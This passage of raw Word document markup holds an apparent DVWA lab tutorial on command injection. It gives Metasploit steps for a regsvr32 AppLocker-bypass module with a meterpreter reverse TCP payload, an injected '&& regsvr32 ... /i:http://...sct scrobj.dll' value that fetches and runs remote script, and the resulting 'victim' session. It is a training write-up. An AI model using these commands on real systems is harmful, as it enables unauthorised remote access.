          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> in kali terminal and then type the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1AEB9" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>/regsvr32_applocker_bypass_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958ADFF" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(regsvr32_applocker_bypass_server) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A17F1B8" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(regsvr32_applocker_bypass_server) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0F0C4" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(regsvr32_applocker_bypass_server) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>  4444</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10416FA4" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(regsvr32_applocker_bypass_server) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964914A" w14:textId="636991D7" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="648C62CD" wp14:editId="68461391">
            <wp:extent cx="5731510" cy="2031365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13188324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031365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62268BE3" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can use the following command in order to open a port on the remote host and to connect back to it with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD172A8" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>192.168.1.100 &amp;&amp; regsvr32 /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>i:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>://192.168.1.103:8080/C99PdFH.sct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D288627" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF4809" w14:textId="279F8D96" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B74BB4" wp14:editId="3757352B">
            <wp:extent cx="4733925" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3508736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33925" cy="1171575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B27C9" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you will get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> session of victim’s PC. And type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> to get system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E20B6E" w14:textId="44593FCD" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE0348C" wp14:editId="148EC647">
            <wp:extent cx="5731510" cy="4300220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18562987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300220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD6AC2" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Bypass Medium Level Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D554841" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Click on DVWA Security and set Website Security Level </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
